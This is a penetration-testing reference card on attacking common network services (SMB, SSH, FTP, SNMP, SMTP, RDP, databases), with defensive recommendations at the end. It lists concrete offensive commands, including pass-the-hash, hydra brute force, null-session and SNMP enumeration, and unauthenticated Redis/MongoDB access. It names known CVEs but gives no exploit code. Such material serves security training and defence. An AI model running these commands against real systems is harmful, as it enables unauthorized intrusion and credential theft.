Skip to content

Service Protocol Attacks

Each network service (SMB, SSH, FTP, SNMP, SMTP, RDP, databases) has its own weaknesses, insecure configurations, and attack techniques. This card walks the most common services you’ll meet after enumeration (see Network Service Enumeration) and what to attack in each: default credentials, anonymous access, vulnerable versions, and protocols insecure by design.

SMB (139/445) — the most exploited on Windows networks

Section titled “SMB (139/445) — the most exploited on Windows networks”
# enumeration and access
nxc smb host -u '' -p '' --shares --users # null session
smbclient //host/share -N # anonymous connection
# attacks
nxc smb host -u user -H <NThash> # Pass-the-Hash (see ad-lateral)
# historical CVEs: EternalBlue (MS17-010), SMBGhost (CVE-2020-0796)
nmap --script=smb-vuln-ms17-010 -p445 host

SMB is the door to the domain: shares with credentials, PtH, relay (see NTLM Relay).

# enumeration
ssh-audit host ; nmap --script=ssh-auth-methods host
# attacks
hydra -L users.txt -P pass.txt ssh://host # brute force (mind lockout)
# stolen private keys, authorized_keys, agent hijacking
# CVEs: by version (libssh auth bypass CVE-2018-10933, etc.)
# anonymous access (very common)
ftp host -> anonymous / anonymous
nmap --script=ftp-anon -p21 host
# attacks: weak credentials, webshell upload if FTP->webroot, FTP bounce
# community strings (public = read-only, private = write)
onesixtyone -c communities.txt host
snmpwalk -v2c -c public host # dump the whole MIB
snmpbulkwalk -v2c -c public host # faster
# reveals: processes, users, software, interfaces, routes, sometimes credentials

SNMP v1/v2c isn’t encrypted and uses trivial community strings: gold for internal recon.

# user enumeration
smtp-user-enum -M VRFY -U users.txt -t host
# open relay (send mail as anyone -> phishing)
nmap --script=smtp-open-relay -p25 host
nmap --script=rdp-ntlm-info,rdp-enum-encryption -p3389 host
# BlueKeep (CVE-2019-0708): preauth RCE on old versions
# attacks: brute force (crowbar/hydra), PtH with Restricted Admin (see ad-lateral)
xfreerdp /v:host /u:user /pth:<NThash>

Databases (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)

Section titled “Databases (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)”
# default / no-auth credentials
mysql -h host -u root # no password (common in labs/dev)
redis-cli -h host # Redis without auth -> file/SSH-key write
mongo host # MongoDB without auth -> full dump
# MSSQL: xp_cmdshell, linked servers (see ad-mssql)
mssqlclient.py user:pass@host -windows-auth

Redis and MongoDB without authentication exposed to the Internet are frequent critical findings.

Legacy protocols with no encryption: credentials travel in plaintext → capture via sniffing (see Network Sniffing). Their mere presence is already a finding.

Cross-cutting principles: change default credentials, disable anonymous access and cleartext legacy protocols (Telnet, FTP, SNMPv1/2c → use SSH/FTPS/SNMPv3), patch vulnerable versions (EternalBlue, BlueKeep), don’t expose databases to the Internet, strong authentication + MFA where applicable, and segmentation. Monitor brute force (many login failures).

  • SMB: null session, shares, PtH, ms17-010
  • SSH: auth methods, version, controlled brute force
  • FTP: anonymous access, weak credentials
  • SNMP: community strings and MIB walk
  • SMTP: user enumeration and open relay
  • RDP: NTLM info, BlueKeep, PtH
  • Databases: no-auth / default credentials (Redis/Mongo/MySQL)
  • Cleartext protocols (Telnet) for sniffing capture